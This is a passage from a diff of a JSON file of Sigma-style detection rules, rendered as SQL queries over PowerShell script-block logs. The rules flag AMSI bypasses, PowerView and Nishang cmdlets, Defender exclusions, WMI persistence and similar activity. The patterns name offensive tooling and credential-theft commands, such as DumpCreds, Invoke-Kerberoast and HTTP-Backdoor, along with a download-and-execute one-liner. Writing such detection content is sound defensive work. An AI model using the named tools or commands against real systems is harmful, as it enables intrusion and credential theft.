'4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND (ScriptBlockText LIKE '%MSAcpi\\_ThermalZoneTemperature%' ESCAPE '\\' OR ScriptBlockText LIKE '%Win32\\_ComputerSystem%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -ExclusionPath %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionExtension %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionProcess %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionIpAddress %' ESCAPE '\\') AND (ScriptBlockText LIKE '%Add-MpPreference %' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MpPreference %' ESCAPE '\\'))" ], - "filename": "posh_ps_detect_vm_env.yml" + "filename": "posh_ps_win_defender_exclusions_added.yml" }, { - "title": "AMSI Bypass Pattern Assembly GetType", - "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", - "status": "experimental", - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", - "author": "Florian Roth (Nextron Systems)", + "title": "Malicious PowerView PowerShell Commandlets", + "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "status": "test", + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Should not be any as administrators do not use this tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND 
ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" ], - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" + "filename": "posh_ps_powerview_malicious_commandlets.yml" }, { - "title": "Remove Account From Domain Admin 
Group", - "id": "48a45d45-8112-416b-8a67-46e03a4b2107", + "title": "Powershell WMI Persistence", + "id": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", "status": "test", - "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", + "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", "author": "frack113", "tags": [ - "attack.impact", - "attack.t1531" + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-ADGroupMember%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Identity %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Members %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName \\_\\_EventFilter %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName CommandLineEventConsumer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_remove_adgroupmember.yml" + "filename": "posh_ps_wmi_persistence.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share - PS", - "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", - "status": 
"experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Get-ADReplAccount", + "id": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "status": "test", + "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.credential_access", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADReplAccount%' ESCAPE '\\' AND ScriptBlockText LIKE '%-All %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Server %' ESCAPE '\\')" ], - "filename": "posh_ps_mailboxexport_share.yml" + "filename": "posh_ps_get_adreplaccount.yml" }, { - "title": "Execution via CL_Invocation.ps1 - Powershell", - "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "status": "experimental", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious Unblock-File", + "id": "5947497f-1aa4-41dd-9693-c9848d58727d", + "status": "test", + "description": "Remove the 
Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1553.005" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Unblock-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\')" ], - "filename": "posh_ps_cl_invocation_lolscript.yml" + "filename": "posh_ps_susp_unblock_file.yml" }, { - "title": "Change PowerShell Policies to an Insecure Level - PowerShell", - "id": "61d0475c-173f-4844-86f7-f3eebae1c66b", - "status": "experimental", - "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "title": "Suspicious Start-Process PassThru", + "id": "0718cd72-f316-4aa2-988f-838ea8533277", + "status": "test", + "description": "Powershell use PassThru option to start in background", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Administrator script" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Set-ExecutionPolicy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Unrestricted%' ESCAPE '\\' OR ScriptBlockText LIKE '%bypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((ScriptBlockText LIKE '%(New-Object 
System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-PassThru %' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath %' ESCAPE '\\')" ], - "filename": "posh_ps_set_policies_to_unsecure_level.yml" + "filename": "posh_ps_susp_start_process.yml" }, { - "title": "PowerShell Write-EventLog Usage", - "id": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", + "id": "22d80745-6f2c-46da-826b-77adaededd74", "status": "experimental", - "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate applications writing events via this cmdlet. 
Investigate alerts to determine if the action is benign" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Write-EventLog%' ESCAPE '\\' AND ScriptBlockText LIKE '%-RawData %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_write_eventlog.yml" + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" }, { - "title": "PowerShell Create Local User", - "id": "243de76f-4725-4f2e-8225-a8a69b15ad61", - "status": "test", - "description": "Detects creation of a local user via PowerShell", - "author": "@ROxPinTeddy", + "title": "Potential Suspicious Windows Feature Enabled", + "id": "55c925c1-7195-426b-a136-a9396800e29b", + "status": "experimental", + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion" ], "falsepositives": [ - 
"Legitimate user creation" + "Legitimate usage of the features listed in the rule." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%TelnetServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TFTP%' ESCAPE '\\' OR ScriptBlockText LIKE '%SMB1Protocol%' ESCAPE '\\' OR ScriptBlockText LIKE '%Client-ProjFS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" ], - "filename": "posh_ps_create_local_user.yml" + "filename": "posh_ps_enable_susp_windows_optional_feature.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", - "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "title": "Potential Persistence Via Security Descriptors - ScriptBlock", + "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. 
As seen used in the DAMP project.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" + "filename": "posh_ps_susp_ace_tampering.yml" }, { - "title": "Powershell XML Execute Command", - "id": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", + "title": "Suspicious TCP Tunnel Via PowerShell Script", + "id": "bd33d2aa-497e-4651-9893-5c5364646595", "status": "experimental", - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. 
(Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", - "author": "frack113", + "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Xml.XmlDocument%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Load%' ESCAPE '\\' AND (ScriptBlockText LIKE '%IEX %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Expression %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Command %' ESCAPE '\\' OR ScriptBlockText LIKE '%ICM -%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Net.HttpWebRequest]%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.Sockets.TcpListener%' ESCAPE '\\' AND ScriptBlockText LIKE '%AcceptTcpClient%' ESCAPE '\\')" ], - "filename": "posh_ps_xml_iex.yml" + "filename": "posh_ps_susp_proxy_scripts.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", - "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "title": "Malicious Nishang PowerShell Commandlets", + "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "author": "Alec 
Costello", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -6346,425 +6239,418 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR 